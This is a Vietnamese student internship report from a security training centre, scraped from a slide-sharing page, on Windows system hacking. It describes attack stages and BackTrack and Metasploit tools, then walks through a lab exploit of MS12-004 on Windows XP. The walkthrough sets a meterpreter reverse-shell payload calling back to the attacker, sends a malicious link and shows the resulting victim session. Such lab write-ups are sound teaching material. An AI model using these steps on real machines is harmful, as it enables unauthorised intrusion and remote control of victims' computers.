Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu _08300812092019
Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu _08300812092019Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu _08300812092019
Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu _08300812092019
 
Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu
Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu
Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu
 
E Lib&Learning
E Lib&LearningE Lib&Learning
E Lib&Learning
 
Canh bao hinh thuc lay nhiem ransomware
Canh bao hinh thuc lay nhiem ransomwareCanh bao hinh thuc lay nhiem ransomware
Canh bao hinh thuc lay nhiem ransomware
 
Báo cáo thực tập cuối kỳ
Báo cáo thực tập cuối kỳBáo cáo thực tập cuối kỳ
Báo cáo thực tập cuối kỳ
 
Báo cáo thực tập - Đàm Văn Sáng
Báo cáo thực tập  - Đàm Văn SángBáo cáo thực tập  - Đàm Văn Sáng
Báo cáo thực tập - Đàm Văn Sáng
 
Virus full
Virus fullVirus full
Virus full
 
Nghiên cứu một số hình thức tấn công website phổ biến và các giải pháp phòng ...
Nghiên cứu một số hình thức tấn công website phổ biến và các giải pháp phòng ...Nghiên cứu một số hình thức tấn công website phổ biến và các giải pháp phòng ...
Nghiên cứu một số hình thức tấn công website phổ biến và các giải pháp phòng ...
 
An Ninh Mạng Và Kỹ Thuật Session Hijacking.pdf
An Ninh Mạng Và Kỹ Thuật Session Hijacking.pdfAn Ninh Mạng Và Kỹ Thuật Session Hijacking.pdf
An Ninh Mạng Và Kỹ Thuật Session Hijacking.pdf
 
Bao cao thuc tap nguyen hoai huy
Bao cao thuc tap   nguyen hoai huyBao cao thuc tap   nguyen hoai huy
Bao cao thuc tap nguyen hoai huy
 
Bai 8
Bai 8Bai 8
Bai 8
 
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1
 
Mạng máy tính nâng cao
Mạng máy tính nâng caoMạng máy tính nâng cao
Mạng máy tính nâng cao
 
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1
 
Bài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPT
Bài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPTBài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPT
Bài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPT
 

SYSTEM HACKING - TUẦN 2

  • 1. MỞ ĐẦU Theo thống kê của công ty Bkav, từ đầu năm 2013 đến nay, tại Việt Nam đã có 2.405 website của các cơ quan, doanh nghiệp bị xâm nhập, trung bình mỗi tháng có khoảng 300 website bị tấn công. Ông Vũ Ngọc Sơn, Phó chủ tịch phụ trách Nghiên cứu phát triển của Bkav cho biết, các cơ quan doanh nghiệp bị tấn công gần như là đầy đủ, từ ít nghiêm trọng đến nghiêm trọng và rất nghiêm trọng (nhằm đánh cắp các tài liệu mật) và các mã độc này nhắm cả vào Bộ Công An, Bộ Quốc phòng, ngân hàng, các cơ quan đơn vị nghiên cứu, các doanh nghiệp… Theo nhìn nhận của Bkav, đã có những chiến dịch tấn công, phát tán mã độc có chủ đích vào Việt Nam. Trong đó, bản thân các vụ tấn công trên mạng và các vụ xâm nhập hệ thống công nghệ thông tin là nhằm do thám, trục lợi, phá hoại dữ liệu, ăn cắp tài sản, cạnh tranh không lành mạnh và một số vụ mất an toàn thông tin số khác đang gia tăng ở mức báo động về số lượng, đa dạng về hình thức, tinh vi hơn về công nghệ. Trước tình hình đó, song song việc ban hành chỉ thị 897/CT-TTg, Thủ Tướng chỉ đạo các Bộ, ngành, địa phương tăng cường giải pháp đảm bảo an toàn thông tin số. Thủ tướng Chính phủ cũng đã nêu rõ, trong thời gian qua, tình hình mất an toàn thông tin số ở nước ta diễn biến phức tạp, xuất hiện nhiều nguy cơ đe dọa nghiêm trọng đến việc ứng dụng công nghệ thông tin phục vụ phát triển kinh tế - xã hội và đảm bảo quốc phòng, an ninh. Bài báo cáo này sẽ giới thiệu tổng quát về các phương pháp mà Hacker sử dụng để tấn công xâm nhập và khai thác vào các phiển bản hệ điều hành Windows, hệ điều hành phổ biến nhất hiện nay tại Việt Nam, từ đó giúp chúng ta nắm rõ cách thức mà Hacker sử dụng và đưa ra các giải pháp giúp cho mỗi người dùng được an toàn thông tin, bảo mật trong thời đại Internet ngày nay. Dương Đình Tú.
  • 2. LỜI CẢM ƠN Để thực hiện và hoàn thành đề tài này, trước hết tôi xin cảm ơn đến các thầy, giảng viên hướng dẫn sinh viên thực tập tại Trung tâm đào tạo quản trị mạng và an ninh mạng quốc tế ATHENA, đã tận tình chỉ bảo trong thời gian vừa qua. Tôi cũng xin gửi lời cám ơn đến các anh chị, bạn bè đã truyền đạt kinh nghiệm và tạo điều kiện cho tôi hoàn thành đề tài này. Trong quá trình thực hiện đề tài không thể không có những sai sót, mong thầy cô tại trung tâm ATHENA và các bạn thẳng thắn góp ý đề tôi rút kinh nghiệm trong các công trình tìm hiểu, phát triển sau này. Dương Đình Tú. PHẦN 1: GIỚI THIỆU 1.1 System Hacking và Tình hình an ninh mạng Việt Nam System hacking bao gồm những kỹ thuật lấy username, password dựa vào phần mềm cài trên hệ thống hoặc tính dễ cài đặt và chạy các dịch vụ từ xa của hệ điều hành Windows. Nâng quyền trong hệ thống, sử dụng keyloger để lấy thông tin, xóa những log file hệ thống. Một khi đã xâm nhập vào hệ thống, Hacker có thể thực hiện mọi thứ trên máy tính đó, gây ra những hậu quả vô cùng nghiêm trọng cho các cá nhân, tổ chức. 1.2 Các lỗ hổng thường khai thác trong hệ điều hành Windows Phần mềm máy tính ngày nay vô cùng phức tạp, bao gồm hàng ngàn dòng mã. Phần mềm được viết ra bởi con người, nên cũng chẳng có gì lạ khi trong đó có chứa những lỗi lập trình, được biết đến với tên gọi lỗ hổng. Những lỗ hổng này được Hacker sử dụng để xâm nhập vào hệ thống, cũng như được tác giả của các đọan mã độc dùng để khởi động chương trình của họ một cách tự động trên máy tính của bạn. Hiện nay các lỗ hổng bảo mật được phát hiện càng nhiều trong các hệ điều hành, các Web Server hay các phần mềm khác, ... Và các hãng sản xuất luôn cập nhật các lỗ
  • 3. hổng và đưa ra các phiên bản mới sau khi đã vá lại các lỗ hổng của các phiên bản trước. Do đó, người sử dụng phải luôn cập nhật thông tin và nâng cấp phiên bản cũ mà mình đang sử dụng nếu không các Hacker sẽ lợi dụng điều này để tấn công vào hệ thống. Thông thường, các forum của các hãng nổi tiếng luôn cập nhật các lỗ hổng bảo mật và việc khai thác các lỗ hổng đó như thế nào thì tùy từng người. Microsoft luôn có những cải tiến an ninh vượt trội qua mỗi phiên bản mới của hệ điều hành Windows. Tuy nhiên, một sự thật là các mối đe dọa mạng vẫn đang ngày càng phát triển nhanh hơn so với chu trình cập nhật và đổi mới hệ điều hành của Microsoft. Tội phạm mạng thường sử dụng các lỗ hổng trong các mã chương trình để truy cập vào các dữ liệu và tài nguyên trên máy tính bị lỗi bảo mật. Các chương trình độc hại được thiết kế đặc biệt để khai thác các lỗ hổng này, được gọi là kỹ thuật exploit, đang ngày càng phổ biến nhanh chóng. Những sản phẩm của Microsoft thường gặp phải các lỗ hổng bảo mật như HĐH Windows, Internet Explorer, Windows Server, Microsoft Exchange và .NetFramework. 1.3 Quá trình tấn công vào một hệ thống Trước tiên ta sẽ tìm hiểu tổng quát một quá trình tấn công hệ thống. Mục tiêu phía trước của chúng ta là một hệ thống máy tính. Các bước để tấn công, đánh sập nó, có thể được liệt kê như hình vẽ bên cạnh. Nó gồm 6 công đoạn như sau:
  • 4. • Enumerate (liệt kê): Trích ra tất cả những thông tin có thể về user trong hệ thống. Sử dụng phương pháp thăm dò SNMP để có được những thông tin hữu ích, chính xác hơn. • Crack: Công đoạn này có lẽ hấp dẫn nhiều Hackernhất. Bước này yêu cầu chúng ta bẽ khóa mật khẩu đăng nhập của user. Hoặc bằng một cách nào khác, mục tiêu phải đạt tới là quyền truy cập vào hệ thống. • Escalste (leo thang): Nói cho dễ hiểu là chuyển đổi giới hạn truy cập từ user binh thường lên admin hoặc user có quyền cao hơn đủ cho chúng ta tấn công. • Execute (thực thi): Thực thi ứng dụng trên hệ thống máy đích. Chuẩn bị trước malware, keylogger, rootkit…để chạy nó trên máy tính tấn công. • Hide (ẩn file): Những file thực thi, file soucecode chạy chương trình… Cần phải được làm ẩn đi, tránh bị mục tiêu phát hiện tiêu diệt.
  • 5. • Tracks (dấu vết): Tất nhiên không phải là để lại dấu vết. Những thông tin có liên quan đến bạn cần phải bị xóa sạch, không để lại bất cứ thứ gì. Nếu không khả năng bạn bị phát hiện là kẻ đột nhập là rất cao. Tóm lại, quá trình tấn công hệ thống (System hacking) là bước tiếp theo sau quá trình khảo sát, thu thập thông tin của mục tiêu cần tấn công bằng những kỹ thuật như Footprinting, Social engineering, Enumeration, Google Hacking… đã được áp dụng cho mục đích truy tìm thông tin. Khi hệ thống mục tiêu đã được xác định, chúng ta bắt đầu đi vào quá trình tấn công hệ thống thật sự. Ta phải tiến hành những kỹ thuật khác nhau để làm sao vào được trong hệ thống đó, thực hiện những việc mà mình mong muốn, như xóa dữ liệu, chạy chương trình trojan, keylogger… PHẦN 2: SỬ DỤNG BACKTRACK ĐỂ KHAI THÁC XÂM NHẬP TRONG MẠNG LAN 2.1 Hệ điều hành Backtrack 5 R3 Backtrack là một bản phân phối dạng Live DVD của Linux, được phát triển để thử nghiệm xâm nhập. Backtrack là sự hợp nhất giữa 3 bản phân phối khác nhau của Linux về thâm nhập thử nghiệm IWHAX, WHOPPIX, và Auditor. Trong phiên bản hiện tại của nó (5), Backtrack được dựa trên phiên bản phân phối Linux Ubuntu 11.10. Công cụ Backtrack đã có lịch sử phát triển khá lâu qua nhiều bản linux khác nhau. Phiên bản hiện nay sử dụng bản phân phối Slackware linux (Tomas M.(www.slax.org)). Backtrack liên tục cập nhật các công cụ, drivers,... Hiện tại Backtrack có trên 300 công cụ phục vụ cho việc nghiên cứu bảo mật. Backtrack là sự kết hợp giữa 2 bộ công cụ kiểm thử bảo mật rất nổi tiếng là Whax và Auditor.
  • 6. Backtrack 5 chứa một số công cụ có thể được sử dụng trong quá trình thử nghiệm thâm nhập của chúng ta. Các công cụ kiểm tra thâm nhập trong Backtrack 5 có thể được phân loại như sau: • Information gathering: loại này có chứa một số công cụ có thể được sử dụng để có được thông tin liên quan đến một mục tiêu DNS, định tuyến, địa chỉ e-mail, trang web, máy chủ mail, và như vậy. Thông tin này được th u thập từ các thông tin có sẵn trên Internet, mà không cần chạm vào môi trường mục tiêu. • Network mapping: loại này chứa các công cụ có thể được sử dụng để kiểm tra các host đang tồn tại, thông tin về OS, ứng dụng được sử dụng bởi mục tiêu, và cũng làm portscanning. • Vulnerability identification: Trong thể loại này, chúng ta có thể tìm thấy các công cụ để quét các lỗ hổng (tổng hợp) và trong các thiết bị Cisco. Nó cũng chứa các công cụ để thực hiện và phân tích Server Message Block (SMB) và Simple Network Management Protocol (SNMP). • Web application analysis: loại này chứa các công cụ có thể được sử dụng trong theo dõi, giám sát các ứng dụng web. • Radio network analysis: Để kiểm tra mạng không dây, bluetooth và nhận dạng tần số vô tuyến (RFID), chúng ta có thể sử dụng các công cụ trong thể loại này. • Penetration: loại này chứa các công cụ có thể được sử dụng để khai thác các lỗ hổng tìm thấy trong các máy tính mục tiêu. • Privilege escalation: Sau khi khai thác các lỗ hổng và được truy cập vào các máy tính mục tiêu, chúng ta có thể sử dụng các công cụ trong loại này để nâng cao đặc quyền của chúng ta cho các đặc quyền cao nhất. • Maintaining access: Công cụ trong loại này sẽ có thể giúp chúng ta trong việc duy trì quyền truy cập vào các máy tính mục tiêu. Chúng ta có thể cần để có được những đặc quyền cao nhất trước khi các chúng ta có thể cài đặt công cụ để duy trì quyền truy cập.
  • 7. • Voice Over IP (VOIP): Để phân tích VOIP chúng ta có thể sử dụng các công cụ trong thể loại này. • Digital forensics: Trong loại này, chúng ta có thể tìm thấy một số công cụ có thể được sử dụng để làm phân tích kỹ thuật như có được hình ảnh đĩa cứng, cấu trúc các tập tin, và phân tích hình ảnh đĩa cứng. Để sử dụng các công cụ cung cấp trong thể loại này, chúng ta có thể chọn Start Backtrack Forensics trong trình đơn khởi động. Đôi khi sẽ đòi hỏi chúng ta phải gắn kết nội bộ đĩa cứng và các tập tin trao đổi trong chế độ chỉ đọc để bảo tồn tính toàn vẹn. • Reverse engineering: Thể loại này chứa các công cụ có thể được sử dụng để gỡ rối chương trình một hoặc tháo rời một tập tin thực thi. Chúng ta có thể tải bản Backtrack 5 tại địa chỉ: www.backtracklinux.org/downloads/ 2.2 Phần mềm Metasploit Metasploit là một dự án bảo mật máy tính cung cấp các thông tin về vấn đề lỗ hổng bảo mật cũng như giúp đỡ về kiểm tra thăm nhập và phát triển hệ thống phát hiện tấn công mạng. Metasploit Framework là một môi trường dùng để kiểm tra, tấn công và khai thác lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng đối tượng Perl, với những components được viết bằng C, assembler, và Python. Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS. Chúng ta có thể download chương trình tại www.metasploit.com. Metasploit hỗ trợ nhiều giao diện với người dùng: • Console interface: dùng lệnh msfconsole. Msfconsole interface sử dụng các dòng lệnh để cấu hình, kiểm tra nên nhanh hơn và mềm dẻo hơn. • Web interface: dùng msfweb, giao tiếp với người dùng thông qua giao diện Web. • Command line interface: dùng msfcli.
  • 8. Metasploit Enviroment: Global Enviroment: Được thực thi thông qua 2 câu lệnh setg và unsetg, những options được gán ở đây sẽ mang tính toàn cục, được đưa vào tất cả các module exploits. Temporary Enviroment: Được thực thi thông qua 2 câu lệnh set và unset, enviroment này chỉ được đưa vào module exploit đang load hiện tại, không ảnh hưởng đến các module exploit khác Chúng có thể lưu lại enviroment mình đã cấu hình thông qua lệnh save. Môi trường đó sẽ được lưu trong ./msf/config và sẽ được load trở lại khi user interface được thực hiện. Sử dụng Metasploit Framework: a) Chọn module exploit: Lựa chọn chương trình, dịch vụ lỗi mà Metasploit có hỗ trợ để khai thác • Show exploits: xem các module exploit mà framework có hỗ trợ. • Use exploit_name: chọn module exploit. • Info exploit_name: xem thông tin về module exploit. Chúng ta nên cập nhật thường xuyên các lỗi dịch vụ cũng như các modul trên www.metasploit.com hoặc qua lệnh msfupdate hoặc svnupdat/opt/metasploit/msf3/. b) Cấu hình Module exploit đã chọn: • show options: Xác định những options nào cần cấu hình. • set : cấu hình cho những option của module đó. Một vài module còn có những advanced options, chúng ta có thể xem bằng cách gõ dòng lệnh show advanceds. c) Verify những options vừa cấu hình: • check: kiểm tra xem những option đã được set chính xác chưa. d) Lựa chọn target:
  • 9. • show targets: những target được cung cấp bởi module đó. • set: xác định target nào. e) Lựa chọn payload: • show payloads: liệt kê ra những payload của module exploit hiện tại. • info payload_name: xem thông tin chi tiết về payload đó. • set payload payload_name: xác định payload module name. Sau khi lựa chọn payload nào, dùng lệnh show options để xem những options của payload đó. • show advanced: xem những advanced options của payload đó. g) Thực thi exploit: exploit: lệnh dùng để thực thi payload code. Payload sau đó sẽ cung cấp cho chúng ta những thông tin về hệ thống được khai thác. 2.3 Sơ đồ tổng quan hệ thống mạng LAN
  • 10. Trong một mạng LAN nội bộ, các máy tính thường kết nối với nhau với khoảng cách vật lý gần như trong một phòng, một tầng, một tòa nhà, công ty, … Các máy tính trong mạng LAN có thể chia sẻ tài nguyên với nhau, mà điển hình là chia sẻ tập tin, máy in, máy quét và một số thiết bị khác. Khi một máy tính ở trong mạng LAN, nó có thể sử dụng các chương trình, phần mềm quét hệ thống mạng để biết được địa chỉ IP các host có trong mạng. Nmap (Network Mapper) là một tiện ích nguồn mở miễn phí cho phát hiện mạng và kiểm toán an ninh. Nmap và Zenmap (Công cụ hỗ trợ đồ họa của nmap) được cài đặt sẵn trong BackTrack, sử dụng các gói tin IP giúp xác định host nào có sẵn trên mạng, các dịch vụ (tên ứng dụng và phiên bản) mà host đó đang cung cấp, hệ điều hành gì (và các phiên bản hệ điều hành) mà họ đang chạy, loại bộ lọc gói tin hoặc tường lửa nào đang sử dụng, và nhiều đặc điểm khác. Nmap chạy được trên tất cả các hệ điều hành, và các gói nhị phân chính thức có sẵn cho Linux, Windows, và Mac OS X. Sau khi xác định được các host có trong mạng, ta có thể sử dụng các công cụ quét lỗi hệ thống để xác định lỗ hổng của hệ thống muốn xâm nhập, từ đó khai thác truy cập vào hệ thống. Một trong số các công cụ quét lỗi này là Nessus, download tại địa chỉ http://www.nessus.org/. Một khi đã xâm nhập thành công và chiếm được toàn quyền điều khiển hệ thống, Hacker có thể thực hiện mọi việc trên máy nạn nhân như down/upload files, thay đổi cấu trúc hệ thống, thực thi chương trình, đánh cắp mật khẩu, cài trojan/ backdoor, … 2.4 Xâm nhập và khai thác Windows XP Lỗ hổng sử dụng: Ms12_004 • Khởi động msfconsole tử cửa sổ terminal của BackTrack. • Khai báo lỗ hổng sử dụng và thiết đặt options: • search ms12_004 • use exploit/windows/browser/ms12_004_midi
  • 11. • show options • set SRVHOST 192.168.142.128 • set PAYLOAD windows/meterpreter/reverse_tcp • set LHOST 192.168.142.128 • exploit BackTrack sẽ tạo ra một link chứa mã độc (http ://192.168.142.128:4444). Chỉ cần nạn nhân nhấp chuột vào link trên thì BackTrack sẽ tự dộng gửi mã độc sang máy nạn nhân và sau đó có thể xem thông tin, chiến quyền của máy nạn nhân đó.
  • 12. Tiến hành khai thác máy nạn nhân có IP: 192.168.142.129 port 1051. • sessions • sessions –i 1 • getuid • sysinfo
  • 13. Hacked: khai thác thành công lỗi ms12_004 trên winXP SP2 Nạn nhân : • Computer: YANLOVE – 2BFCA08. • Os: Windows XP (Build 2600. Service Pack 2). • Architecture: x86. • Systemlanguage: en_US. • Meterpreter: x86/win32